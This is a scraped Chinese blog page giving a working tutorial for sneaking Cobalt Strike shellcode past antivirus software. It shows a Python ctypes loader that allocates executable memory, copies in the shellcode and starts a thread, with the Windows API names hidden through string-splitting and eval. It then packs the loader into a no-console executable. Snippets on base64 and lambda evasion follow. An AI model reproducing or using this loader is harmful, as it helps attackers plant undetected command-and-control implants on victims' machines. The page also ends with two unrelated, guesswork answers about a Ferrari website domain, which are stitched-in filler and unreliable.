cs免杀-使用python进行免杀_python 免杀cs df 在线_amd6700k的博客

相关文章推荐
追风的水煮鱼 · freemarker常见语法大全 - CSDN文库· 4 周前 ·
大方的椅子 · Trying to check if a ...· 11 月前 ·
多情的啄木鸟 · JDK1.8 新特性 (六)：Stream ...· 1 年前 ·
自信的冰淇淋 · DataGridView 控件中的列类型 ...· 1 年前 ·
使用python版本为python3.6 32位版本，64位版本测试会报错。
安装pyinstaller，pywin32
pip3 install pyinstaller
pip3 install pywin32
生成shellcode
 
使用cobalsstrike生成c语言shellcode。
 
  
使用shellcode loader加载shellcode
 
#!/usr/bin/python3
import ctypes
#shellcode 放这个位置
c = b"\xfc\xe8\x89\x00\x00\x00\x60\x89";
shellcode = bytearray(c)
a = 'ctypes.windll.' + 'kernel32.VirtualAlloc'
ptr = eval(a)(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))
b = 'ctypes.windll.kernel32.' + 'RtlMoveMemory'
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
eval(b)(ctypes.c_int(ptr),
                                     ctypes.c_int(len(shellcode)))
d = 'ctypes.windll.kernel32.' + 'CreateThread'
ht = eval(d)(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))
e = 'ctypes.windll.kernel32.WaitFor' + 'SingleObject'
eval(e)(ctypes.c_int(ht),ctypes.c_int(-1))
可以使用加密等方法进行免杀。 
打包生成exe
 
pyinstaller -F shell.py --noconsole
运行，机器上线
 
                    环境使用python版本为python3.6 32位版本，64位版本测试会报错。安装pyinstaller，pywin32pip3 install pyinstallerpip3 install pywin32生成shellcode使用cobalsstrike生成c语言shellcode。使用shellcode loader加载shellcode#!/usr/bin/python3import ctypes#shellcode 放这个位置c = b"\xfc\xe8\x89\x
之前学习免杀都是使用Metasploit自带的编码进行，从未成功过。也使用过GitHub上别人提供的免杀方法，最近学习并实践发现绕过国内的杀毒软件貌似并不难，本文使用手工分析特征码，使用base64编码绕过杀毒软件静态分析。虽然使用的方法比较简单，但对实际做免杀及免杀研究还是有一定意义的。
Windows 10 x64
	Python 3.8.3
	Pyinstaller
	火绒版本：5.0..
				最近学习的过程中，发现python的匿名函数很适合用于免杀在python中，除了一般使用def定义的函数外，还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方，但在定义时被严格限定为单一表达式。从语义上讲，它只是普通函数的语法糖。
我的理解，匿名函数就是另外一个函数的隐含调用
下方func处无论是什么内容，都会返回system这个字符串
如果把执行内容换成whoami
如下方代码段所示：
运行就可以获取whoami信息...
采用分离法，即将ShellCode和加载器分离。方法较LOW但免杀。
本文主要将ShellCode转成HEX，再通过加载器执行ShellCode。
PS: 何为SC加载器，即专门用于加载所提供ShellCode的工具。
如同HTTP发包工具，支持提交HTTP，写死参数最多只能叫EXP。
再详细点，打个比方，你只会炒一个菜，你敢说你是厨师吗？
0x002 ShellCo...
				### 回答1：
cs.ferrari-china-tos.com 是一个网站的域名，它代表了费拉利在中国的在线平台。费拉利是一家意大利豪华汽车制造商，以其高性能和豪华著称。在这个网站上，我们可以找到与费拉利汽车有关的各种信息。
通过访问 cs.ferrari-china-tos.com，用户可以了解到关于费拉里汽车在中国市场的最新动态和新闻。这些信息可能包括有关新车型的发布、价格和配置、销售活动以及与费拉利相关的赛事和活动等。
此外，该网站还提供了费拉里汽车的详细产品介绍和技术规格。用户可以浏览不同车型的图片库和视频库，了解到费拉利汽车的外观设计和内部配置。还可以了解到汽车的性能指标、引擎参数和驾驶体验等。
cs.ferrari-china-tos.com 还提供了与费拉里汽车购买和售后服务相关的信息。用户可以了解到购车流程、合作经销商、试驾活动、维修保养服务等。网站上可能也会提供联系方式，方便用户咨询或预约。
总而言之，cs.ferrari-china-tos.com 是一个为中国市场打造的费拉利品牌官方网站，为用户提供了丰富的费拉利汽车信息和服务。无论是对于热爱豪车的消费者，还是对费拉利品牌感兴趣的人士，这个网站都是一个了解和获取最新消息的重要平台。  
### 回答2：
cs.ferrari-china-tos.com是一个网站的网址。根据这个网址的结构可以看出，"cs"可能代表 "Customer Service"，意味着这个网站提供法拉利汽车在中国的客户服务。"ferrari-china"意味着这个网站是关于法拉利汽车在中国市场的信息和服务的。"tos"可能是"Terms of Service"的缩写，表示网站可能提供法拉利汽车在中国的服务条款和使用规定。这个网站可能包含法拉利汽车在中国市场的销售、维修、售后服务、保养指南等内容。用户可以通过这个网站了解法拉利汽车在中国市场的最新资讯、购买法拉利汽车的流程和要求、寻找授权的服务中心、联系客服进行咨询等。这个网站可能对法拉利车主和即将成为法拉利车主的消费者都提供了相关的信息和支持。